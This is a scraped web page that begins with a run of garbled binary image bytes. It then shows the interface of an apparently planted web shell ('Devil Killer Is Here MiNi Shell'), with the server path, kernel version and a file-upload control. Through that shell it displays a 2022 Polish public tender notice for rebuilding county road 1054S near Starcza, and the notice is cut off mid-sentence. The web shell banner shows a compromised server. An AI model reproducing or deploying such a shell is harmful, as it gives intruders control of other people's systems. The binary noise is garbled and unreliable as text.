JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220104/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20220104/0000336802-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> PRZEBUDOWA DROGI POWIATOWEJ NR 1054S - odc. Starcza - Łysiec, gmina Starcza </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiatowy Zarząd Dróg w Częstochowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 151406009</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Jana III Sobieskiego 9</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Częstochowa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">42-217</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL224 - Częstochowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">343229222</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">343785468</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">pzd@czestochowa.powiat.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.pzdczestochowa.4bip.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> PRZEBUDOWA DROGI POWIATOWEJ NR 1054S - odc. Starcza - Łysiec, gmina Starcza </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-62ecb825-6d4e-11ec-ae77-fe331fedffdc</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00003368</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-01-04</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://pzd-czestochowa.logintrade.net/rejestracja/ustawowe.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://pzdczestochowa.logintrade.net</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu<br/>opisane zostały w Regulaminie korzystania z elektronicznej platformy usług Zamawiającego pod<br/>adresem:<br/>https://pzd-czestochowa.logintrade.net/rejestracja/instrukcje.html</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Zamawiający wymaga złożenia oferty w postaci katalogu elektronicznego</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Działając zgodnie z art. 13 ust. 1 i ust. 2 ogólnego<br/>Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie<br/>ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego<br/>przepływu takich danych oraz uchylenia dyrektywy 95/46/WE – dalej w skrócie zwane RODO,<br/>informujemy, iż:<br/>1. Administratorem Państwa danych osobowych jest Powiatowy Zarząd Dróg w Częstochowie z<br/>siedzibą przy ul. Jana III Sobieskiego 9, tel. 34/3229222, fax. 34/3785468<br/>2. Kontakt z inspektorem ochrony danych jest możliwy pod adresem: ido@czestochowa.powiat.pl<br/>3. Państwa dane osobowe przetwarzane będą na podstawie:<br/>art. 6 ust. 1 lit. b RODO - przetwarzanie jest niezbędne do zawarcia i realizacji umowy,<br/>art. 6. ust. 1 lit. c RODO - przetwarzanie jest niezbędne do wypełnienia obowiązku prawnego<br/>ciążącego na administratorze, art. 6 ust. 1 lit. e RODO - przetwarzanie jest niezbędne do wykonania zadania realizowanego w<br/>interesie publicznym.<br/>4. Państwa dane osobowe będą wykorzystywane w celu udzielenia zamówienia publicznego na<br/>podstawie przepisów Prawa zamówień publicznych (Ustawa z dnia 11 września 2019r. Prawo<br/>zamówień publicznych z póżn. zmianami) dalej „ustawa Pzp” oraz po udzieleniu zamówienia, w celu<br/>realizacji umowy.<br/>5. Odbiorcami Państwa danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 18 ustawy Pzp (Dz. U. z 2021r. poz. 1129 z późniejszymi<br/>zmianami).<br/>6. Państwa dane osobowe będą przetwarzane przez okres niezbędny do realizacji celu przetwarzania<br/>w zakresie udzielenia zamówienia publicznego na podstawie ustawy Pzp oraz realizacji umowy do<br/>momentu wygaśnięcia obowiązków przetwarzania danych wynikających z przepisów prawa. Następnie<br/>dane osobowe zostaną zarchiwizowane zgodnie z obowiązującymi przepisami prawa. W przypadku<br/>unieważnienia postępowania o udzielenia zamówienia publicznego Państwa dane będą przetwarzane<br/>do momentu wygaśnięcia obowiązków ich przetwarzania wynikających z przepisów prawa, w tym<br/>przepisów dotyczących archiwizacji.<br/>7. Obowiązek podania przez Państwa danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>ustawy Pzp.<br/>8. Posiadają Państwa następujące prawa:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych;<br/>− na podstawie art. 16 RODO prawo do sprostowania *;<br/>− na podstawie art. 18 RODO prawo żądania od Administratora Danych Osobowych ograniczenia<br/>przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO<br/>**;<br/>9. W przypadku uznania, iż przetwarzanie danych osobowych Administratora narusza przepisy RODO,<br/>przysługuje Państwu prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych (ul.<br/>Stawki 2, Warszawa 00-193).<br/>10. Nie przysługuje Państwu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Państwa danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>postępowania<br/>o udzielenie zamówienia publicznego ani zmianą postanowień umowy w sprawie zamówienia<br/>publicznego w zakresie niezgodnym z ustawą.<br/>** Wyjaśnienie: W postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia<br/>przetwarzania, o którym mowa w art.18 ust.1 RODO, nie ogranicza przetwarzania danych osobowych<br/>do czasu zakończenia tego postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PZD.272.2.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia są roboty budowlane polegające na przebudowie drogi powiatowej nr 1054S - odcinek Starcza - Łysiec gm. Starcza w zakresie przebudowy jezdni, budowy chodnika, ścieżki pieszo-rowerowej, zakrycie rowów, budowy wpustów ulicznych oraz budową i przebudową zjazdów po stronie chodnika i ścieżki pieszo-rowerowej.<br/>W zakresie inwestycji znajduje się:<br/>−	Poszerzenie jezdni na łukach poziomych,<br/>−	Budowa systemu rowów zakrytych z wpustami ulicznymi,<br/>−	Budowa chodnika,<br/>−	Budowa pobocza,<br/>−	Wykonanie rozbiórki istniejącej nawierzchni i transport odspojonych materiałów w miejsce wskazane przez Inwestora lub jego przedstawiciela,<br/>−	Usunięcie nadmiaru gruntu oraz przeprowadzenie niezbędnych zabezpieczeń nadziemnych części infrastruktury podziemnej,<br/>−	Wykonanie zabezpieczeń gruntu nasypowego (żelbetowe prefabrykowane ściany oporowe)<br/>−	Wykonanie nowej konstrukcji jezdni i chodników<br/>−	Wykonanie regulacji pionowej wpustów ulicznych i nadziemnych części infrastruktury podziemnej,<br/>−	Wykonanie konstrukcji chodników, zjazdów i opaski bezpieczeństwa,<br/>−	Dokonanie nasadzeń drzew<br/>−	Rekultywacja terenów zieleni w postaci wykonania trawników siewem.<br/>Część drogowa <br/>- Kategoria drogi/numer drogi	Powiatowa/1054S<br/>- Klasa drogi	Z<br/>- Kategoria obciążenia ruchem	KR3<br/>- Długość projektowanej przebudowy drogi	2831,76 mb<br/>Konstrukcja nawierzchni<br/>jezdnia drogi powiatowej<br/>-	W-wa ścieralna min.-bit. AC11S gr. 4cm (PN-EN 13108-1)<br/>-	W-wa wiążąca mit.-bit. AC16W gr. 10cm (PN-EN 13108-1)<br/>-	W-wa podbudowy zasadniczej z mieszanki niezwiązanej C50/30 0/31,5 gr 17cm<br/>-	Georuszt trójosiowy typu 1x,<br/>-	20 cm warstwa mrozoochronna z mieszanki niezwiązanej o CBR&gt;35%, <br/>- 20 cm warstwa ulepszonego podłoża z mieszanki niezwiązanej o CBR&gt;20%, podłoże gruntowe (E2&gt;35MPa).<br/>chodnik <br/>-Kostka betonowa gr. 8 cm bezfazowa zgodna z PN-EN 1338:2005<br/>-Podsypka piaskowo – cementowa 4:1 gr. 4 cm<br/>-Podbudowa z kruszywa łamanego 0/31,5 mm gr. 15 cm zgodna z PN-S-06102:1997<br/>-Warstwa odcinająca z pospółki gr. 10 cm zgodnie z PN-EN 13043:2004<br/>zjazdy<br/>-Kostka betonowa gr. 8 cm bezfazowa zgodna z PN-EN 1338:2005<br/>-Podsypka piaskowo – cementowa 4:1 gr. 4 cm<br/>-Podbudowa z kruszywa łamanego 0/31,5 mm gr. 20 cm zgodna z PN-S-06102:1997<br/>-Warstwa odcinająca z pospółki gr. 10 cm zgodnie z PN-EN 13043:2004<br/>pobocze<br/>-Kruszywo łamane dolomitowe 0/31,5 mm gr. 20 cm zgodne z PN-S-06102:1997<br/>-Piasek żwirowy gr. 15cm (PN-EN ISO 14688-1:2006)<br/>-Grunt G1<br/>Odwodnienie<br/>Odwodnienie pasa drogowego realizowane będzie za pomocą systemu odwodnienia w postaci rowów zakrytych za pośrednictwem wpustów ulicznych i odwodnień liniowych.<br/>W śladzie zagospodarowania występuje sieć kanalizacji sanitarnej, przyłącza sieci energetycznej, wodociąg z przyłączami i częściowo sieć gazowa i z przyłączami.<br/>W okolicach zbliżeń do ujawnionych na mapie do celów projektowych elementach infrastruktury podziemnej, roboty ziemne prowadzić ręcznie. W zbliżeniach projektowanych rurociągów na sieci energetycznej zamontować dwudzielne rury ochronne.<br/>Szczegółowy opis przedmiotu zamówienia, tj. rodzaj robót do wykonania w ramach zamówienia określa dokumentacja techniczna (Projekt Budowlany) stanowiąca załącznik zał. Nr 1 do SWZ.<br/>W przypadku zmiany obowiązujących norm jakościowych w trakcie trwania umowy, Wykonawca będzie zobowiązany dostosować jakość wykonywanych robót dotyczących przedmiotu zamówienia do nowych norm.<br/>Warunki dodatkowe dotyczące przedmiotu zamówienia:<br/>1.	Wykonawca zobowiązuje się do udzielenia Zamawiającemu gwarancji jakości wykonania min. 60 miesięcy.<br/>2.	Zamówienie należy realizować w oparciu o obowiązujące w budownictwie drogowym normy, instrukcje, szczegółowe specyfikacje techniczne na roboty utrzymaniowe.<br/>3.	Zaleca się, aby Wykonawca zdobył wszystkie informacje, które mogą być konieczne do przygotowania oferty oraz podpisania umowy.<br/>4.	Zamawiający dopuszcza ujęcie w ofercie, a następnie zastosowanie materiałów równoważnych o parametrach technicznych nie gorszych niż określono w dokumentacji technicznej. Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego, jest obowiązany wykazać, ze oferowane przez niego dostawy materiałów do realizacji zadania spełniają wymagania określone przez Zamawiającego.<br/>Zgodnie z art. 101 ust. 4 ustawy Pzp w sytuacji, gdyby w dokumentacji, a więc w dokumentach opisującym przedmiot zamówienia, zawarto odniesienie do norm, ocen technicznych, aprobat, specyfikacji technicznych i systemów referencji technicznych, o których mowa w art. 101 ust. 1 pkt 2 i ust. 3 Pzp a takim odniesieniom nie towarzyszyło wyrażenie „lub równoważne”, to Zamawiający dopuszcza rozwiązania równoważne opisywanym w każdej takiej normie, europejskiej ocenie technicznej, aprobacie, specyfikacji technicznej, systemowi referencji technicznych. W związku z powyższym należy przyjąć, że każdej: normie, europejskiej ocenie technicznej, aprobacie, specyfikacji technicznej, systemowi referencji technicznych występujących w opisie przedmiotu zamówienia towarzyszą wyrazy „lub równoważne&#34;. Zgodnie z art. 101 ust. 5 Pzp wykonawca, który powołuje się na rozwiązania równoważne opisywanym w tych dokumentach, jest obowiązany udowodnić, poprzez dołączenie do oferty stosownych przedmiotowych środków dowodowych, o których mowa w art. 104–107 Pzp, że proponowane rozwiązania w równoważnym stopniu spełniają wymagania określone w opisie przedmiotu zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45231000-5 - Roboty budowlane w zakresie budowy rurociągów, ciągów komunikacyjnych i linii energetycznych</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">8 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Opis kryteriów oceny ofert wraz z podaniem wag tych kryteriów i sposobu<br/>oceny ofert.<br/>1) kryterium oceny ofert jest:<br/>- CENA ryczałtowa brutto – 90 %,<br/>- długość gwarancji (za wykonany przedmiot zamówienia) waga 10 %<br/>2) sposób oceny<br/>Wzór do obliczenia punktowego w kryterium DŁUGOŚĆ GWARANCJI/RĘKOJMI podany w liczbie<br/>miesięcy: okres gwarancji/rękojmi jakości zostaną przyznane w ilości po 5,00 punktu za każde pełne 12<br/>miesięcy przedłużenia okresu gwarancji powyżej 60 miesięcy (minimalny okres gwarancji) z tym, że<br/>maksymalnie jest możliwe uzyskanie 10,00 punktów za okres większy lub równy 84 miesiącom<br/>gwarancji.<br/>Wykonawcy, którzy określą w formularzu ofertowym (zał. 1 do SIWZ):<br/>- 60 miesięcy gwarancji/rękojmi za wykonany przedmiot zamówienia otrzymają<br/>0,0 % - 0,00 pkt<br/>- 72 miesiące gwarancji/rękojmi za wykonany przedmiot zamówienia otrzymają<br/>5,0 % - 5,00 pkt<br/>- 84 miesiące gwarancji/rękojmi za wykonany przedmiot zamówienia otrzymają<br/>10,0 % - 10,00 pkt.<br/>Łączna ilość punktów uzyskanych przez ofertę zostanie obliczona według poniższego wzoru:<br/>K = (Kc) + (Kg) gdzie:<br/>K – łączna ilość punktów uzyskana przez ofertę<br/>Kc – punkty uzyskane w kryterium CENA<br/>Kg – punkty uzyskane w kryterium DŁUGOŚĆ GWARANCJI/RĘKOJMI<br/>UWAGA: W przypadku, jeżeli wykonawca nie poda w załączniku długości gwarancji/rękojmi za<br/>wykonany przedmiot zamówienia Zamawiający nie przyzna punktów za to kryterium oceny ofert.<br/>„Wymagania jakościowe odnoszące się do co najmniej głównych elementów składających się na<br/>przedmiot zamówienia, o których mowa w art. 246 ust. 2 Pzp z 11.09.2019 r: zostały określone w opisie<br/>przedmiotu zamówienia, czyli w dokumentacji projektowej i specyfikacji technicznej wykonania i odbioru<br/>robót. Dokumenty te wskazują parametry wszystkich materiałów i urządzeń, które będą musiały być<br/>użyte do realizacji przedmiotu zamówienia jak również zasady wiedzy technicznej wymagane do<br/>wykonania robót. Uwzględnią także wszystkie elementy, które mają wpływ na koszty związane z<br/>eksploatacją oraz utylizacją przedmiotu zamówienia. Dokumenty opisujące przedmiot zamówienia są<br/>tak precyzyjne, że bez względu na fakt, kto będzie wykonawcą przedmiotu zamówienia jedyną różnicą<br/>będą zaoferowane ceny (tzn. przedmiot zamówienia jest zestandaryzowany - identyczny, niezależnie<br/>od tego, który z wykonawców go wykona). W związku z powyższym Zamawiający jest upoważniony do<br/>zastosowania ceny, jako jedynego kryterium wyboru oferty</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">długość gwarancji (za wykonany przedmiot zamówienia)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. Posiadanie doświadczenia niezbędnego do wykonania przedmiotu zamówienia, tj.<br/>udokumentowanie wykonania, tj. zakończenia w okresie ostatnich trzech lat przed upływem<br/>terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie co<br/>najmniej jednej roboty budowlanej w zakresie niezbędnym do wykazania spełniania warunku<br/>wiedzy i doświadczenia w niniejszym postępowaniu odpowiadające swoim rodzajem usługom<br/>stanowiącym przedmiot zamówienia.<br/>Określenie „robota budowlana w zakresie niezbędnym do wykazania spełniania warunku wiedzy<br/>i doświadczenia w niniejszym postępowaniu” oznacza: minimum 1 robotę budowlaną,<br/>odpowiadającą swoim rodzajem robotom budowlanym o wartości każdej roboty nie mniejszej niż<br/>500.000,00 zł (brutto).<br/>Określenie „roboty budowlane odpowiadające swoim rodzajem robotom budowlanym<br/>stanowiącym przedmiot zamówienia” oznacza: wykonanie robót polegających na robotach<br/>związanych z budową, remontem lub przebudową dróg. Ocenę spełniania warunku udziału w<br/>postępowaniu zamawiający przeprowadzi na podstawie załączonego do oferty oświadczenia<br/>wykazu robót<br/>W przypadku robót budowlanych, których wartość została wyrażona w umowie w innej walucie<br/>niż PLN należy dokonać przeliczenia tej waluty na PLN przy zastosowaniu średniego kursu NBP<br/>na dzień zakończenia robót (w przypadku robót rozliczanych wyłącznie w walutach innych niż<br/>PLN).<br/>Uwaga: w celu spełnienia wymagań wynikających z treści art. 117 ust. 3 Pzp w sytuacji, gdy<br/>powyższy warunek będzie spełniony przez jednego ze wspólników konsorcjum to ten wspólnik<br/>musi wykonać część robót budowlanych o wartości co najmniej 500.000,00 zł brutto.<br/>Uwaga: w celu spełnienia wymagań wynikających z treści art. 118 ust. 2 Pzp w sytuacji, gdy<br/>powyższy warunek będzie spełniony nie przez wykonawcę lub wspólnika konsorcjum, a przez „<br/>podmiot udostępniający zasoby wykonawcy (tzw. „podmiot trzeci”), to „podmiot” ten musi być<br/>podwykonawcą części robót budowlanych o wartości co najmniej 